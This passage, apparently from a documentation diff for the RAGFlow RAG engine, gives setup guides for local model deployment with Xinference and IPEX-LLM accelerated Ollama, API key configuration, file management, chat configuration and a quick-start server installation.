- For a complete list of supported models, see the [Builtin Models](https://inference.readthedocs.io/en/latest/models/builtin/).
:::

To deploy a local model, e.g., **Mistral**, using Xinference:

### 1. Check firewall settings

Ensure that your host machine's firewall allows inbound connections on port 9997.

### 2. Start an Xinference instance

```bash
$ xinference-local --host 0.0.0.0 --port 9997
```

### 3. Launch your local model

Launch your local model (**Mistral**), ensuring that you replace `${quantization}` with your chosen quantization method:

```bash
$ xinference launch -u mistral --model-name mistral-v0.1 --size-in-billions 7 --model-format pytorch --quantization ${quantization}
```
### 4. Add Xinference

In RAGFlow, click on your logo on the top right of the page **>** **Model Providers** and add Xinference to RAGFlow:

![add xinference](https://github.com/infiniflow/ragflow/assets/93570324/10635088-028b-4b3d-add9-5c5a6e626814)

### 5. Complete basic Xinference settings

Enter an accessible base URL, such as `http://<your-xinference-endpoint-domain>:9997/v1`.
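
Before adding Xinference to RAGFlow, you can sanity-check that this base URL is reachable. Xinference exposes an OpenAI-compatible API, so listing the served models is a quick test (the endpoint domain is a placeholder):

```bash
# A JSON list containing your launched model (e.g., mistral) confirms
# that the base URL is reachable from where you run this command.
curl http://<your-xinference-endpoint-domain>:9997/v1/models
```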

### 6. Update System Model Settings

Click on your logo **>** **Model Providers** **>** **System Model Settings** to update your model.

*You should now be able to find **mistral** in the dropdown list under **Chat model**.*

> If your local model is an embedding model, you should find it under **Embedding model**.

### 7. Update Chat Configuration

Update your chat model accordingly in **Chat Configuration**:

> If your local model is an embedding model, update it on the configuration page of your knowledge base.

## Deploy a local model using IPEX-LLM

[IPEX-LLM](https://github.com/intel-analytics/ipex-llm) is a PyTorch library for running LLMs on Intel CPUs and GPUs (e.g., a local PC with an iGPU, or a discrete GPU such as Arc, Flex, or Max) with very low latency.

To deploy a local model, e.g., **Qwen2**, using IPEX-LLM, follow the steps below:

### 1. Check firewall settings

Ensure that your host machine's firewall allows inbound connections on port 11434. For example:

```bash
sudo ufw allow 11434/tcp
```

### 2. Install and start Ollama serve using IPEX-LLM

#### 2.1 Install IPEX-LLM for Ollama

IPEX-LLM's support for `ollama` is now available on Linux and Windows.

Visit [Run llama.cpp with IPEX-LLM on Intel GPU Guide](https://github.com/intel-analytics/ipex-llm/blob/main/docs/mddocs/Quickstart/llama_cpp_quickstart.md), and follow the instructions in section [Prerequisites](https://github.com/intel-analytics/ipex-llm/blob/main/docs/mddocs/Quickstart/llama_cpp_quickstart.md#0-prerequisites) to set up your environment and section [Install IPEX-LLM cpp](https://github.com/intel-analytics/ipex-llm/blob/main/docs/mddocs/Quickstart/llama_cpp_quickstart.md#1-install-ipex-llm-for-llamacpp) to install IPEX-LLM with the Ollama binaries.

**After the installation, you should have created a conda environment, named `llm-cpp` for instance, for running `ollama` commands with IPEX-LLM.**
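
For reference, the linked guide installs the IPEX-LLM Ollama binaries with commands along these lines; treat this as a sketch and defer to the guide for the current commands, since they may change:

```bash
# Create and activate a conda environment (the guide names it llm-cpp),
# then install the llama.cpp/Ollama binaries provided by IPEX-LLM.
conda create -n llm-cpp python=3.11
conda activate llm-cpp
pip install --pre --upgrade ipex-llm[cpp]
```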

#### 2.2 Initialize Ollama

Activate the `llm-cpp` conda environment and initialize Ollama by executing the commands below. A symbolic link to `ollama` will appear in your current directory.

- For **Linux users**:

  ```bash
  conda activate llm-cpp
  init-ollama
  ```

- For **Windows users**:

  Please run the following command with **administrator privilege in Miniforge Prompt**.

  ```cmd
  conda activate llm-cpp
  init-ollama.bat
  ```

> [!NOTE]
> If you have installed a higher version of `ipex-llm[cpp]` and want to upgrade your ollama binary file, don't forget to remove the old binary files first and initialize again with `init-ollama` or `init-ollama.bat`.

**Now you can use this executable file following standard Ollama usage.**

#### 2.3 Run Ollama Serve

You may launch the Ollama service as below:

- For **Linux users**:

  ```bash
  export OLLAMA_NUM_GPU=999
  export no_proxy=localhost,127.0.0.1
  export ZES_ENABLE_SYSMAN=1
  source /opt/intel/oneapi/setvars.sh
  export SYCL_CACHE_PERSISTENT=1

  ./ollama serve
  ```

- For **Windows users**:

  Please run the following command in Miniforge Prompt.

  ```cmd
  set OLLAMA_NUM_GPU=999
  set no_proxy=localhost,127.0.0.1
  set ZES_ENABLE_SYSMAN=1
  set SYCL_CACHE_PERSISTENT=1

  ollama serve
  ```

> Please set the environment variable `OLLAMA_NUM_GPU` to `999` to make sure all layers of your model run on the Intel GPU; otherwise, some layers may run on the CPU.

> If your local LLM is running on Intel Arc™ A-Series Graphics with Linux OS (Kernel 6.2), it is recommended to additionally set the following environment variable for optimal performance before executing `ollama serve`:
>
> ```bash
> export SYCL_PI_LEVEL_ZERO_USE_IMMEDIATE_COMMANDLISTS=1
> ```

> To allow the service to accept connections from all IP addresses, use `OLLAMA_HOST=0.0.0.0 ./ollama serve` instead of just `./ollama serve`.

The console will display messages similar to the following:

![](https://llm-assets.readthedocs.io/en/latest/_images/ollama_serve.png)

### 3. Pull and Run Ollama Model

Keep the Ollama service on, open another terminal, and run `./ollama pull <model_name>` on Linux (`ollama.exe pull <model_name>` on Windows) to automatically pull a model, e.g., `qwen2:latest`:

![](https://llm-assets.readthedocs.io/en/latest/_images/ollama_pull.png)

#### Run Ollama Model

- For **Linux users**:

  ```bash
  ./ollama run qwen2:latest
  ```

- For **Windows users**:

  ```cmd
  ollama run qwen2:latest
  ```

### 4. Configure RAGFlow to use IPEX-LLM accelerated Ollama

The configuration follows the steps in the Ollama sections above: Section 4 [Add Ollama](#4-add-ollama), Section 5 [Complete basic Ollama settings](#5-complete-basic-ollama-settings), Section 6 [Update System Model Settings](#6-update-system-model-settings), and Section 7 [Update Chat Configuration](#7-update-chat-configuration).

**docs/guides/llm_api_key_setup.md** (new file, 63 lines)

---
sidebar_position: 4
slug: /llm_api_key_setup
---

# Configure your API key

An API key is required for RAGFlow to interact with an online AI model. This guide provides information about setting your API key in RAGFlow.

## Get your API key

For now, RAGFlow supports the following online LLMs. Click the corresponding link to apply for your API key. Most LLM providers grant newly created accounts trial credit, which expires in a couple of months, or a promotional amount of free quota.

- [OpenAI](https://platform.openai.com/login?launch),
- [Tongyi-Qianwen](https://dashscope.console.aliyun.com/model),
- [ZHIPU-AI](https://open.bigmodel.cn/),
- [Moonshot](https://platform.moonshot.cn/docs),
- [DeepSeek](https://platform.deepseek.com/api-docs/),
- [Baichuan](https://www.baichuan-ai.com/home),
- [VolcEngine](https://www.volcengine.com/docs/82379).

:::note
If you find your online LLM is not on the list, don't feel disheartened. The list is expanding, and you can [file a feature request](https://github.com/infiniflow/ragflow/issues/new?assignees=&labels=feature+request&projects=&template=feature_request.yml&title=%5BFeature+Request%5D%3A+) with us! Alternatively, if you have customized or locally-deployed models, you can [bind them to RAGFlow using Ollama or Xinference](./deploy_local_llm.md).
:::

## Configure your API key

You have two options for configuring your API key:

- Configure it in **service_conf.yaml** before starting RAGFlow.
- Configure it on the **Model Providers** page after logging into RAGFlow.

### Configure API key before starting up RAGFlow

1. Navigate to **./docker/ragflow**.
2. Find entry **user_default_llm** and update it (a sketch of this entry follows the list below):
   - Update `factory` with your chosen LLM.
   - Update `api_key` with yours.
   - Update `base_url` if you use a proxy to connect to the remote service.
3. Reboot your system for your changes to take effect.
4. Log into RAGFlow.

*After logging into RAGFlow, you will find your chosen model listed under **Added models** on the **Model Providers** page.*
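
A minimal sketch of what the **user_default_llm** entry can look like; the keys match the fields described in the steps above, while the values are placeholders to replace with your own:

```
user_default_llm:
  factory: 'Tongyi-Qianwen'  # your chosen LLM factory
  api_key: 'your_api_key'    # the API key you applied for
  base_url: ''               # only needed if you use a proxy
```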

### Configure API key after logging into RAGFlow

:::caution WARNING
After logging into RAGFlow, configuring your API key through the **service_conf.yaml** file will no longer take effect.
:::

After logging into RAGFlow, you can *only* configure your API key on the **Model Providers** page:

1. Click on your logo on the top right of the page **>** **Model Providers**.
2. Find your model card under **Models to be added** and click **Add the model**:
![add model](https://github.com/infiniflow/ragflow/assets/93570324/069b6509-ca68-42b8-a379-405ec5de5a92)
3. Paste your API key.
4. Fill in your base URL if you use a proxy to connect to the remote service.
5. Click **OK** to confirm your changes.

:::note
If you wish to update an existing API key at a later point:
![update api key](https://github.com/infiniflow/ragflow/assets/93570324/6e77236b-d8b6-42e7-b18a-af36a3a14dcb)
:::
**docs/guides/manage_files.md** (new file, 84 lines)

---
sidebar_position: 3
slug: /manage_files
---

# Manage files

Knowledge base, hallucination-free chat, and file management are the three pillars of RAGFlow. RAGFlow's file management allows you to upload files individually or in bulk. You can then link an uploaded file to multiple target knowledge bases. This guide showcases some basic usages of the file management feature.

## Create folder

RAGFlow's file management allows you to establish your file system with nested folder structures. To create a folder in the root directory of RAGFlow:

![create new folder](https://github.com/infiniflow/ragflow/assets/93570324/3a37a5f4-43a6-426d-a62a-e5cd2ff7a533)

> Each knowledge base in RAGFlow has a corresponding folder under the **root/.knowledgebase** directory. You are not allowed to create a subfolder within it.

## Upload file

RAGFlow's file management supports file uploads from your local machine, allowing both individual and bulk uploads:

![upload file](https://github.com/infiniflow/ragflow/assets/93570324/5d7ded14-ce2b-4703-8567-9356a978f45c)

![bulk upload](https://github.com/infiniflow/ragflow/assets/93570324/def0db55-824c-4236-b809-a98d8c8674e3)

## Preview file

RAGFlow's file management supports previewing files in the following formats:

- Documents (PDF, DOCX)
- Tables (XLSX)
- Pictures (JPEG, JPG, PNG, TIF, GIF)

![preview](https://github.com/infiniflow/ragflow/assets/93570324/2e931362-8bbf-482c-ac86-b68b09d331bc)

## Link file to knowledge bases

RAGFlow's file management allows you to *link* an uploaded file to multiple knowledge bases, creating a file reference in each target knowledge base. Therefore, deleting a file in your file management will AUTOMATICALLY REMOVE all related file references across the knowledge bases.

![link knowledgebase](https://github.com/infiniflow/ragflow/assets/93570324/6c6b8db4-3269-4e35-9434-6089887e3e3f)

You can link your file to one knowledge base or multiple knowledge bases at one time:

![link multiple kb](https://github.com/infiniflow/ragflow/assets/93570324/6c508803-fb1f-435d-b688-683066fd7fff)

## Move file to specified folder

As of RAGFlow v0.8.0, this feature is *not* available.

## Search files or folders

As of RAGFlow v0.8.0, the search feature is still in a rudimentary form, supporting only file and folder search in the current directory by name (files or folders in the child directory will not be retrieved).

![search file](https://github.com/infiniflow/ragflow/assets/93570324/77ffc2e5-bd80-4ed1-841f-068e664efffe)

## Rename file or folder

RAGFlow's file management allows you to rename a file or folder:

![rename_file](https://github.com/infiniflow/ragflow/assets/93570324/5abb0704-d9e9-4b43-9ed4-5750ccee011f)

## Delete files or folders

RAGFlow's file management allows you to delete files or folders individually or in bulk.

To delete a file or folder:

![delete file](https://github.com/infiniflow/ragflow/assets/93570324/85872728-125d-45e9-a0ee-21e9d4cedb8b)

To bulk delete files or folders:

![bulk delete](https://github.com/infiniflow/ragflow/assets/93570324/519b99ab-ec7f-4c8a-8cea-e0b6dcb3cb46)

> - You are not allowed to delete the **root/.knowledgebase** folder.
> - Deleting files that have been linked to knowledge bases will AUTOMATICALLY REMOVE all associated file references across the knowledge bases.

## Download uploaded file

RAGFlow's file management allows you to download an uploaded file:

![download_file](https://github.com/infiniflow/ragflow/assets/93570324/cf3b297f-7d9b-4522-bf5f-4f45743e4ed5)

> As of RAGFlow v0.8.0, bulk download is not supported, nor can you download an entire folder.
**docs/guides/start_chat.md** (new file, 59 lines)

---
sidebar_position: 2
slug: /start_chat
---

# Start an AI chat

Knowledge base, hallucination-free chat, and file management are the three pillars of RAGFlow. Chats in RAGFlow are based on a particular knowledge base or multiple knowledge bases. Once you have created your knowledge base and finished file parsing, you can go ahead and start an AI conversation.

## Start an AI chat

You start an AI conversation by creating an assistant.

1. Click the **Chat** tab in the middle top of the page **>** **Create an assistant** to show the **Chat Configuration** dialogue *of your next dialogue*.

   > RAGFlow offers you the flexibility of choosing a different chat model for each dialogue, while allowing you to set the default models in **System Model Settings**.

2. Update **Assistant Setting**:

   - **Assistant name** is the name of your chat assistant. Each assistant corresponds to a dialogue with a unique combination of knowledge bases, prompts, hybrid search configurations, and large model settings.
   - **Empty response**:
     - If you wish to *confine* RAGFlow's answers to your knowledge bases, leave a response here. Then, when it doesn't retrieve an answer, it *uniformly* responds with what you set here.
     - If you wish RAGFlow to *improvise* when it doesn't retrieve an answer from your knowledge bases, leave it blank, which may give rise to hallucinations.
   - **Show Quote**: This is a key feature of RAGFlow and is enabled by default. RAGFlow does not work like a black box; instead, it clearly shows the sources of information that its responses are based on.
   - Select the corresponding knowledge bases. You can select one or multiple knowledge bases, but ensure that they use the same embedding model; otherwise an error will occur.

3. Update **Prompt Engine**:

   - In **System**, you fill in the prompts for your LLM; you can also leave the default prompt as-is for the beginning.
   - **Similarity threshold** sets the similarity "bar" for each chunk of text. The default is 0.2. Text chunks with lower similarity scores are filtered out of the final response.
   - **Vector similarity weight** is set to 0.3 by default. RAGFlow uses a hybrid score system, combining keyword similarity and vector similarity, for evaluating the relevance of different text chunks. This value sets the weight assigned to the vector similarity component in the hybrid score.
   - **Top N** determines the *maximum* number of chunks to feed to the LLM. In other words, even if more chunks are retrieved, only the top N chunks are provided as input.
   - **Variable**:

4. Update **Model Setting**:

   - In **Model**, you select the chat model. Though you have selected the default chat model in **System Model Settings**, RAGFlow allows you to choose an alternative chat model for your dialogue.
   - **Freedom** refers to the degree to which the LLM improvises. From **Improvise**, **Precise**, to **Balance**, each freedom level corresponds to a unique combination of **Temperature**, **Top P**, **Presence Penalty**, and **Frequency Penalty**.
   - **Temperature**: Level of the prediction randomness of the LLM. The higher the value, the more creative the LLM is.
   - **Top P** is also known as "nucleus sampling". See [here](https://en.wikipedia.org/wiki/Top-p_sampling) for more information.
   - **Max Tokens**: The maximum length of the LLM's responses. Note that the responses may be curtailed if this value is set too low.

5. Now, let's start the show:

   ![question1](https://github.com/infiniflow/ragflow/assets/93570324/bb72dd67-b35e-4b2a-87e9-4e4edbd6e677)

   ![question2](https://github.com/infiniflow/ragflow/assets/93570324/7cc585ae-88d0-4aa2-8982-7a102a011c06)

## Update settings of an existing dialogue

Hover over an intended dialogue **>** **Edit** to show the chat configuration dialogue:

![edit dialogue](https://github.com/infiniflow/ragflow/assets/93570324/f1b4fa4c-797d-4f8d-b3ff-4c8bb6d0c0a0)

## Integrate chat capabilities into your application

RAGFlow also offers conversation APIs. Hover over your dialogue **>** **Chat Bot API** to integrate RAGFlow's chat capabilities into your application:

![chatbot](https://github.com/infiniflow/ragflow/assets/93570324/e683b728-6d66-47bd-b8bf-5f18bf0a7387)

**(deleted file, 19 lines)**

## Set Before Starting The System

In **user_default_llm** of [service_conf.yaml](./docker/service_conf.yaml), you need to specify the LLM factory and your own _API_KEY_.
RAGFlow supports the following LLM factories, with more coming in the pipeline:

> [OpenAI](https://platform.openai.com/login?launch), [Tongyi-Qianwen](https://dashscope.console.aliyun.com/model),
> [ZHIPU-AI](https://open.bigmodel.cn/), [Moonshot](https://platform.moonshot.cn/docs)

After signing in to these LLM suppliers, create your own API key; they all offer a certain amount of free quota.

## After Starting The System

You can also set your API key in **User Setting** as follows:

<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/e4e4066c-e964-45ff-bd56-c3fc7fb18bd3" width="1000"/>
</div>

**(deleted file, 66 lines)**

# Set vm.max_map_count to at least 262144

## Linux

To check the value of `vm.max_map_count`:

```bash
$ sysctl vm.max_map_count
```

Reset `vm.max_map_count` to a value of at least 262144 if it is less than that.

```bash
# In this case, we set it to 262144:
$ sudo sysctl -w vm.max_map_count=262144
```

This change will be reset after a system reboot. To ensure your change remains permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:

```bash
vm.max_map_count=262144
```

## Mac

```bash
$ screen ~/Library/Containers/com.docker.docker/Data/vms/0/tty
$ sysctl -w vm.max_map_count=262144
```
To exit the screen session, press Ctrl+A, then D.

## Windows and macOS with Docker Desktop

The vm.max_map_count setting must be set via docker-machine:

```bash
$ docker-machine ssh
$ sudo sysctl -w vm.max_map_count=262144
```

## Windows with Docker Desktop WSL 2 backend

To set it manually, you must run the following commands in a command prompt or PowerShell window every time you restart Docker:

```bash
$ wsl -d docker-desktop -u root
$ sysctl -w vm.max_map_count=262144
```
If you are on these versions of WSL and do not want to run those commands every time you restart Docker, you can globally change every WSL distribution with this setting by modifying your %USERPROFILE%\.wslconfig as follows:

```bash
[wsl2]
kernelCommandLine = "sysctl.vm.max_map_count=262144"
```
This will cause all WSL2 VMs to have that setting assigned when they start.

If you are on Windows 11, or Windows 10 version 22H2 with the Microsoft Store version of WSL installed, you can modify /etc/sysctl.conf within the "docker-desktop" WSL distribution, perhaps with commands like this:

```bash
$ wsl -d docker-desktop -u root
$ vi /etc/sysctl.conf
```
and appending a line which reads:
```bash
vm.max_map_count = 262144
```
**(deleted file, 40 lines)**

# Ollama

<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/2019e7ee-1e8a-412e-9349-11bbf702e549" width="130"/>
</div>

One-click deployment of local LLMs, that is [Ollama](https://github.com/ollama/ollama).

## Install

- [Ollama on Linux](https://github.com/ollama/ollama/blob/main/docs/linux.md)
- [Ollama Windows Preview](https://github.com/ollama/ollama/blob/main/docs/windows.md)
- [Docker](https://hub.docker.com/r/ollama/ollama)

## Launch Ollama

Decide which LLM you want to deploy ([here's a list of supported LLMs](https://ollama.com/library)), say, **mistral**:
```bash
$ ollama run mistral
```
Or,
```bash
$ docker exec -it ollama ollama run mistral
```

## Use Ollama in RAGFlow

- Go to 'Settings > Model Providers > Models to be added > Ollama'.

<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/a9df198a-226d-4f30-b8d7-829f00256d46" width="1300"/>
</div>

> Base URL: Enter the base URL where the Ollama service is accessible, e.g., `http://<your-ollama-endpoint-domain>:11434`.

- Use Ollama Models.

<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/60ff384e-5013-41ff-a573-9a543d237fd3" width="530"/>
</div>

**docs/quickstart.mdx** (new file, 292 lines)

---
sidebar_position: 1
slug: /
---

# Quick start
import Tabs from '@theme/Tabs';
import TabItem from '@theme/TabItem';

RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. When integrated with LLMs, it is capable of providing truthful question-answering capabilities, backed by well-founded citations from various complex formatted data.

This quick start guide describes a general process from:

- Starting up a local RAGFlow server,
- Creating a knowledge base,
- Intervening with file parsing, to
- Establishing an AI chat based on your datasets.

## Prerequisites

- CPU ≥ 4 cores;
- RAM ≥ 16 GB;
- Disk ≥ 50 GB;
- Docker ≥ 24.0.0 & Docker Compose ≥ v2.26.1.

> If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).
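
A quick way to verify the Docker-related prerequisites before proceeding:

```bash
# Print the installed versions; compare them against the prerequisites above.
docker --version
docker compose version
```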

## Start up the server

This section provides instructions on setting up the RAGFlow server on Linux. If you are on a different operating system, no worries. Most steps are alike.

<details>
<summary>1. Ensure <code>vm.max_map_count</code> ≥ 262144:</summary>

`vm.max_map_count` sets the maximum number of memory map areas a process may have. Its default value is 65530. While most applications require fewer than a thousand maps, reducing this value can result in abnormal behaviors, and the system will throw out-of-memory errors when a process reaches the limit.

RAGFlow v0.8.0 uses Elasticsearch for multiple recall. Setting the value of `vm.max_map_count` correctly is crucial to the proper functioning of the Elasticsearch component.

<Tabs
  defaultValue="linux"
  values={[
    {label: 'Linux', value: 'linux'},
    {label: 'macOS', value: 'macos'},
    {label: 'Windows', value: 'windows'},
  ]}>
  <TabItem value="linux">

1.1. Check the value of `vm.max_map_count`:

```bash
$ sysctl vm.max_map_count
```

1.2. Reset `vm.max_map_count` to a value of at least 262144 if it is less than that:

```bash
$ sudo sysctl -w vm.max_map_count=262144
```

:::caution WARNING
This change will be reset after a system reboot. If you forget to update the value the next time you start up the server, you may get a `Can't connect to ES cluster` exception.
:::

1.3. To ensure your change remains permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:

```bash
vm.max_map_count=262144
```
  </TabItem>
  <TabItem value="macos">

If you are on macOS with Docker Desktop, then you *must* use docker-machine to update `vm.max_map_count`:

```bash
$ docker-machine ssh
$ sudo sysctl -w vm.max_map_count=262144
```

:::caution WARNING
This change will be reset after a system reboot. If you forget to update the value the next time you start up the server, you may get a `Can't connect to ES cluster` exception.
:::
  </TabItem>
  <TabItem value="windows">

#### If you are on Windows with Docker Desktop, then you *must* use docker-machine to set `vm.max_map_count`:

```bash
$ docker-machine ssh
$ sudo sysctl -w vm.max_map_count=262144
```
#### If you are on Windows with Docker Desktop WSL 2 backend, then use docker-desktop to set `vm.max_map_count`:

1.1. Run the following in WSL:
```bash
$ wsl -d docker-desktop -u root
$ sysctl -w vm.max_map_count=262144
```

:::caution WARNING
This change will be reset after you restart Docker. If you forget to update the value the next time you start up the server, you may get a `Can't connect to ES cluster` exception.
:::

1.2. If you do not wish to run those commands each time you restart Docker, you can update your `%USERPROFILE%\.wslconfig` as follows to keep your change permanent and global for all WSL distributions:

```bash
[wsl2]
kernelCommandLine = "sysctl.vm.max_map_count=262144"
```
*This causes all WSL2 virtual machines to have that setting assigned when they start.*

:::note
If you are on Windows 11 or Windows 10 version 22H2, and have installed the Microsoft Store version of WSL, you can also update the **/etc/sysctl.conf** within the docker-desktop WSL distribution to keep your change permanent:

```bash
$ wsl -d docker-desktop -u root
$ vi /etc/sysctl.conf
```

```bash
# Append a line, which reads:
vm.max_map_count = 262144
```
:::
  </TabItem>
</Tabs>

</details>

2. Clone the repo:

```bash
$ git clone https://github.com/infiniflow/ragflow.git
```

3. Download the pre-built Docker images and start up the server:

> Running the following commands automatically downloads the *dev* version of the RAGFlow Docker image. To download and run a specific released version, update `RAGFLOW_VERSION` in **docker/.env** to the intended version, for example `RAGFLOW_VERSION=v0.8.0`, before running the following commands.

```bash
$ cd ragflow/docker
$ chmod +x ./entrypoint.sh
$ docker compose up -d
```

> The core image is about 9 GB in size and may take a while to load.

4. Check the server status after having the server up and running:

```bash
$ docker logs -f ragflow-server
```

_The following output confirms a successful launch of the system:_

```bash
    ____                 ______ __
   / __ \ ____ _ ____ _ / ____// /____  _      __
  / /_/ // __ `// __ `// /_   / // __ \| | /| / /
 / _, _// /_/ // /_/ // __/  / // /_/ /| |/ |/ /
/_/ |_| \__,_/ \__, //_/    /_/ \____/ |__/|__/
              /____/

 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:9380
 * Running on http://x.x.x.x:9380
INFO:werkzeug:Press CTRL+C to quit
```

> If you skip this confirmation step and directly log in to RAGFlow, your browser may prompt a `network anomaly` error because, at that moment, your RAGFlow may not be fully initialized.

5. In your web browser, enter the IP address of your server and log in to RAGFlow.

:::caution WARNING
With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number), as the default HTTP serving port `80` can be omitted when using the default configurations.
:::

## Configure LLMs

RAGFlow is a RAG engine, and it needs to work with an LLM to offer grounded, hallucination-free question-answering capabilities. For now, RAGFlow supports the following LLMs, and the list is expanding:

- OpenAI
- Tongyi-Qianwen
- ZHIPU-AI
- Moonshot
- DeepSeek-V2
- Baichuan
- VolcEngine

> RAGFlow also supports deploying LLMs locally using Ollama or Xinference, but this part is not covered in this quick start guide.

To add and configure an LLM:

1. Click on your logo on the top right of the page **>** **Model Providers**:

![add llm](https://github.com/infiniflow/ragflow/assets/93570324/10635088-028b-4b3d-add9-5c5a6e626814)

> Each RAGFlow account is able to use **text-embedding-v2** for free, an embedding model from Tongyi-Qianwen. This is why you can see Tongyi-Qianwen in the **Added models** list. And you may need to update your Tongyi-Qianwen API key at a later point.

2. Click on the desired LLM and update the API key accordingly (DeepSeek-V2 in this case):

![update api key](https://github.com/infiniflow/ragflow/assets/93570324/4e5e13ef-a98d-42e6-bcb1-0c6045fc1666)

*Your added models appear as follows:*

![added available models](https://github.com/infiniflow/ragflow/assets/93570324/d08b80e4-f921-480a-b41d-11832489c916)

3. Click **System Model Settings** to select the default models:

- Chat model,
- Embedding model,
- Image-to-text model.

![system model settings](https://github.com/infiniflow/ragflow/assets/93570324/cdcc1da5-4494-44cd-ad5b-1222ed6acc3f)

> Some models, such as the image-to-text model **qwen-vl-max**, are subsidiary to a specific LLM. And you may need to update your API key to access these models.

## Create your first knowledge base

You are allowed to upload files to a knowledge base in RAGFlow and parse them into datasets. A knowledge base is virtually a collection of datasets. Question answering in RAGFlow can be based on a particular knowledge base or multiple knowledge bases. File formats that RAGFlow supports include documents (PDF, DOC, DOCX, TXT, MD), tables (CSV, XLSX, XLS), pictures (JPEG, JPG, PNG, TIF, GIF), and slides (PPT, PPTX).

To create your first knowledge base:

1. Click the **Knowledge Base** tab in the top middle of the page **>** **Create knowledge base**.

2. Input the name of your knowledge base and click **OK** to confirm your changes.

_You are taken to the **Configuration** page of your knowledge base._

![knowledge base configuration](https://github.com/infiniflow/ragflow/assets/93570324/384c671a-8b9c-468c-b1c9-1401128a9b65)

3. RAGFlow offers multiple chunk templates that cater to different document layouts and file formats. Select the embedding model and chunk method (template) for your knowledge base.

> IMPORTANT: Once you have selected an embedding model and used it to parse a file, you are no longer allowed to change it. The obvious reason is that we must ensure that all files in a specific knowledge base are parsed using the *same* embedding model (ensure that they are being compared in the same embedding space).

_You are taken to the **Dataset** page of your knowledge base._

4. Click **+ Add file** **>** **Local files** to start uploading a particular file to the knowledge base.

5. In the uploaded file entry, click the play button to start file parsing:

![file parsing](https://github.com/infiniflow/ragflow/assets/93570324/19f273fa-0ab0-435e-95b3-40f069046a3f)

_When the file parsing completes, its parsing status changes to **SUCCESS**._

## Intervene with file parsing

RAGFlow features visibility and explainability, allowing you to view the chunking results and intervene where necessary. To do so:

1. Click on the file that has completed file parsing to view the chunking results:

_You are taken to the **Chunk** page:_

![chunks](https://github.com/infiniflow/ragflow/assets/93570324/0547fd0e-e71b-41f8-8e0e-31649c85fd3d)

2. Hover over each snapshot for a quick view of each chunk.

3. Double-click the chunked texts to add keywords or make *manual* changes where necessary:

![update chunk](https://github.com/infiniflow/ragflow/assets/93570324/1d84b408-4e9f-46fd-9413-8c1059bf9c76)

4. In Retrieval testing, ask a quick question in **Test text** to double-check if your configurations work:

_As you can tell from the following, RAGFlow responds with truthful citations._

![retrieval test](https://github.com/infiniflow/ragflow/assets/93570324/c03f06f6-f41f-4b20-a97e-ae405d3a950c)

## Set up an AI chat

Conversations in RAGFlow are based on a particular knowledge base or multiple knowledge bases. Once you have created your knowledge base and finished file parsing, you can go ahead and start an AI conversation.

1. Click the **Chat** tab in the middle top of the page **>** **Create an assistant** to show the **Chat Configuration** dialogue *of your next dialogue*.
> RAGFlow offers the flexibility of choosing a different chat model for each dialogue, while allowing you to set the default models in **System Model Settings**.

2. Update **Assistant Setting**:

- Name your assistant and specify your knowledge bases.
- **Empty response**:
  - If you wish to *confine* RAGFlow's answers to your knowledge bases, leave a response here. Then, when it doesn't retrieve an answer, it *uniformly* responds with what you set here.
  - If you wish RAGFlow to *improvise* when it doesn't retrieve an answer from your knowledge bases, leave it blank, which may give rise to hallucinations.

3. Update **Prompt Engine** or leave it as is for the beginning.

4. Update **Model Setting**.

5. RAGFlow also offers conversation APIs. Hover over your dialogue **>** **Chat Bot API** to integrate RAGFlow's chat capabilities into your applications:

![chatbot api](https://github.com/infiniflow/ragflow/assets/93570324/e683b728-6d66-47bd-b8bf-5f18bf0a7387)

6. Now, let's start the show:

![question1](https://github.com/infiniflow/ragflow/assets/93570324/bb72dd67-b35e-4b2a-87e9-4e4edbd6e677)

![question2](https://github.com/infiniflow/ragflow/assets/93570324/7cc585ae-88d0-4aa2-8982-7a102a011c06)
